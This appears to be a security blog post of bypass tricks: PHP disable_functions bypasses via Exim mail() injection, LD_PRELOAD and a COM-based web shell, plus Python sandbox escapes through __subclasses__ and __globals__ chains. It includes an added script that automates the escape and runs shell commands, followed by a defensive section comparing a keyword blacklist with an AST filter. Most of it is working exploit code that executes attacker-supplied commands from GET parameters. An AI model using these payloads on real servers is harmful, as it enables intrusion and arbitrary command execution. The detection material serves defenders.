Some simple bypass tricks
Published Feb 18, 2019
Bypass Disable Functions
Configuration (php.ini): the target disables the usual execution primitives
disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system
Note what is not on that list: mail(), putenv() and the COM class. Every trick below goes through one of those.
Linux
- sendmail -> exim bypass
mail() is still allowed, and its fifth argument is appended to the sendmail command line, which PHP runs through the shell. When sendmail is really Exim, the -be option switches it into expansion-test mode and ${run{...}} executes a command during expansion. A literal space in that argument would be split into separate arguments by the shell, so the command goes into a file and the only space needed (between /bin/sh and the file name) is produced by an Exim expansion instead.
<?php
// Two distinct paths: with one file the shell script would overwrite itself
// with its own output while /bin/sh is still reading it.
$command_file = "/tmp/xxxx";
$output_file  = "/tmp/xxxx.out";
$cmd = isset($argv[1]) ? $argv[1] : $_GET['cmd'];
$cmd = "$cmd > $output_file";
file_put_contents($command_file, $cmd);
// -be: expansion-test mode; ${run{...}}: run a command during expansion;
// ${substr{10}{1}{$tod_log}}: $tod_log is "YYYY-MM-DD hh:mm:ss", and character
// 10 is the space, so this yields "/bin/sh /tmp/xxxx" without a literal space.
mail("root@localhost", "xnxx", "jav", null,
'-xnxxjav@jav(tmp1 -be ${run{/bin/sh${substr{10}{1}{$tod_log}}'.$command_file.'}} tmp2)');
echo file_get_contents($output_file);
unlink($output_file);
unlink($command_file);
- LD_PRELOAD bypass
putenv() is usually not disabled either. Set LD_PRELOAD to a shared object you uploaded, then call any PHP function that forks a child process (mail() again, which spawns sendmail): the dynamic loader maps your library into that child and its constructor runs your payload, no exec()/system() required.
tools: Chankro (generates the shared object and the PHP wrapper that sets the variable and triggers mail())
Windows
- use COM to bypass
<?php
// Requires the com_dotnet extension (extension=php_com_dotnet.dll). COM is a
// class, not a function, so disable_functions never covers it.
$runCommand = "C:\\WINDOWS\\system32\\cmd.exe /c {$_GET['cmd']}";
$WshShell = new COM("WScript.Shell");
// Exec() starts the process and returns a WshScriptExec object; read its
// stdout stream to the end once the child has finished writing.
$output = $WshShell->Exec($runCommand)->StdOut->ReadAll();
echo "<p>$output</p>";
?>
Bypass Python Sandbox
Python
__builtins__ is where names such as open, __import__ and eval are resolved; it is a reference to the builtins module:
python2: __builtin__
python3: builtins
Sandboxes usually start by emptying or replacing it, so the bypasses below never name a builtin at all: they walk from a literal's type up to object and back down into the loaded modules.
Tactic
1. Use the following expression to list every class loaded in the interpreter (each direct subclass of object):
[].__class__.__base__.__subclasses__()
2. Use the following to reach the namespace of the module that defined one of those classes (everything that module imported is in there). The class needs a Python-level __init__; builtin types only have slot wrappers, which carry no __globals__:
cls.__init__.__globals__
3. Some of the classes found in step 1 live in modules that imported os or sys:
python2:
<class 'site._Printer'>
<class 'site.Quitter'>
<class 'warnings.catch_warnings'>
<class 'warnings.WarningMessage'>
python3:
<class '_sitebuiltins.Quitter'>
<class '_sitebuiltins._Printer'>
<class 'warnings.catch_warnings'>
Then apply step 2 to one of them: its globals contain sys, and sys.modules['os'] is the os module.
4. More tricks of this kind are collected in the referenced write-ups.
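The three steps automated, as an added example (not the article's code). The sandbox is simulated with eval() over a namespace whose __builtins__ is empty, which is how naive "safe eval" wrappers are written; the payload strings therefore contain only attribute and subscript walks. os._wrap_close is my addition to the article's class lists: it is defined in os.py, so it is loaded whenever os is, which is always under site. Function names, the CANDIDATES tuple and the sample command are mine.

```python
# Added example, not the article's code: Tactic steps 1-3 against a simulated
# sandbox. Assumptions: the sandbox is eval() with an empty __builtins__, and
# os._wrap_close / _sitebuiltins.Quitter / warnings.catch_warnings are loaded.
SANDBOX = {"__builtins__": {}}
STEP1 = "[].__class__.__base__.__subclasses__()"          # every direct subclass of object
CANDIDATES = ("_wrap_close", "Quitter", "catch_warnings")  # from os, _sitebuiltins, warnings


def sandbox_eval(expr):
    """Evaluate expr the way a naive sandbox does: no builtin is reachable by name."""
    return eval(expr, dict(SANDBOX))


def classes_importing(modname):
    """Step 3 discovery: classes whose defining module imported `modname`.

    Regenerates the article's Python 2 / Python 3 lists for the interpreter
    you are actually in, since names and list positions differ per version.
    """
    hits = []
    for cls in sandbox_eval(STEP1):
        g = getattr(getattr(cls, "__init__", None), "__globals__", None)
        if g is not None and modname in g:
            hits.append("%s.%s" % (cls.__module__, cls.__name__))
    return hits


def find_index(clsname):
    """Position of the first class called clsname in the step 1 list, or -1."""
    for i, cls in enumerate(sandbox_eval(STEP1)):
        if cls.__name__ == clsname:
            return i
    return -1


def reach_expr(modname):
    """Step 2: build a sandbox-only expression that evaluates to module `modname`.

    From the chosen class, __init__.__globals__ is its module's namespace. Then:
      1. the module itself if that namespace imported it directly,
      2. sys.modules[modname] if the namespace imported sys and the module is loaded,
      3. otherwise __builtins__['__import__'](modname) out of that namespace, since an
         imported module's globals always hold the real builtins dict.
    """
    for clsname in CANDIDATES:
        idx = find_index(clsname)
        if idx < 0:
            continue
        g = "%s[%d].__init__.__globals__" % (STEP1, idx)
        if sandbox_eval("%r in %s" % (modname, g)):
            return "%s[%r]" % (g, modname)
        if sandbox_eval("'sys' in %s and %r in %s['sys'].modules" % (g, modname, g)):
            return "%s['sys'].modules[%r]" % (g, modname)
        return "%s['__builtins__']['__import__'](%r)" % (g, modname)
    raise LookupError("none of %r is loaded in this interpreter" % (CANDIDATES,))


def reach(modname):
    """Resolve the module inside the sandbox and hand it back."""
    return sandbox_eval(reach_expr(modname))


def shell_in_sandbox(cmd):
    """Run cmd through os.popen without ever leaving the sandboxed eval."""
    return sandbox_eval(reach_expr("os") + ".popen(%r).read()" % cmd)


if __name__ == "__main__":
    print(classes_importing("sys")[:5])
    print(reach_expr("os"))
    print(shell_in_sandbox("echo escaped"))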
Some interesting standard modules
- https://docs.python.org/2/library/types.html
types.FileType reads files (Python 2 only: it is the file type itself)
- https://docs.python.org/2/library/timeit.html
timeit.timeit executes code (the stmt and setup strings are compiled and run)
- https://docs.python.org/2/library/inspect.html
inspect.getmembers and friends let you map out the structure of code you cannot read
- https://docs.python.org/2/library/pickle.html
pickle.loads executes commands (via a crafted __reduce__ payload)
- https://docs.python.org/2/library/os.html
os.popen executes commands
- https://docs.python.org/2/library/commands.html
commands.getstatusoutput executes commands (Python 2 only)
- https://docs.python.org/2/library/subprocess.html
subprocess.Popen executes commands
- https://docs.python.org/2/library/io.html
io.open reads files
- https://docs.python.org/2/library/platform.html
platform.popen executes commands (deprecated, removed in Python 3.8)
Final
Example (python3):
[w for w in 1..__class__.__base__.__subclasses__() if w.__name__=='Quitter'][0].__init__.__globals__['sy'+'s'].modules['o'+'s'].__dict__['sy'+'stem']('ls')
Read left to right: 1. is a float literal, so 1..__class__ is float and its __base__ is object (step 1 without any brackets); the comprehension picks the Quitter class by name instead of a version-dependent index; its __init__.__globals__ is the _sitebuiltins namespace, which imported sys; sys.modules['os'].__dict__['system'] is os.system. The 'sy'+'s' concatenations keep the strings os, sys and system out of the source so a keyword blacklist never matches.
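Why the keyword blacklist fails and what does fire on these payloads, as an added example that is not part of the article. The inputs are the article's one-liner, a constructed _wrap_close variant (its index 0 is a placeholder; real payloads look the class up by name) and a harmless expression that happens to contain the word sys; BLACKLIST and the function names are my own.

```python
# Added example, not the article's code: a substring blacklist versus an AST
# check, run over constructed payloads.
import ast

PAYLOADS = {
    # the article's final one-liner
    "quitter_chain": (
        "[w for w in 1..__class__.__base__.__subclasses__() if w.__name__=='Quitter']"
        "[0].__init__.__globals__['sy'+'s'].modules['o'+'s'].__dict__['sy'+'stem']('ls')"
    ),
    # constructed variant; index 0 is a placeholder, not a real position
    "wrap_close": "[].__class__.__base__.__subclasses__()[0].__init__.__globals__['popen']('id').read()",
    # harmless, but contains the word "sys"
    "benign": "sum(x*x for x in range(10)) + len('sys')",
}

BLACKLIST = ("os", "sys", "system", "import", "subprocess")


def substring_filter(src):
    """The naive defence: accept unless a dangerous word appears verbatim.

    Returns True when src would be accepted.
    """
    return not any(word in src for word in BLACKLIST)


def ast_filter(src):
    """Reject any expression that reads a dunder attribute.

    Every chain in the article must spell __class__, __base__, __subclasses__,
    __init__, __globals__ or __dict__ as a real attribute node: with no
    builtins there is no getattr() to build the name at runtime. The 'sy'+'s'
    trick only hides dictionary keys, not the attribute walk before them.
    Returns True when src would be accepted.
    """
    try:
        tree = ast.parse(src, mode="eval")
    except SyntaxError:
        return False
    return not any(
        isinstance(node, ast.Attribute) and node.attr.startswith("__")
        for node in ast.walk(tree)
    )


def checked_eval(src):
    """Evaluate src with no builtins, but only after ast_filter accepted it."""
    if not ast_filter(src):
        raise ValueError("rejected: dunder attribute access")
    return eval(src, {"__builtins__": {}})


def verdicts():
    """Both filters over every payload: {name: (substring_ok, ast_ok)}."""
    return {name: (substring_filter(src), ast_filter(src)) for name, src in PAYLOADS.items()}


if __name__ == "__main__":
    for name, (sub_ok, ast_ok) in verdicts().items():
        print("%-14s substring=%-5s ast=%s" % (name, sub_ok, ast_ok))
```

The substring filter accepts both attack chains and rejects the harmless expression, the reverse of what is wanted. The AST check narrows the attack surface considerably under an empty __builtins__, but it is not a sandbox: evaluating untrusted expressions in-process remains the wrong design, and process isolation (or no eval at all) is the fix.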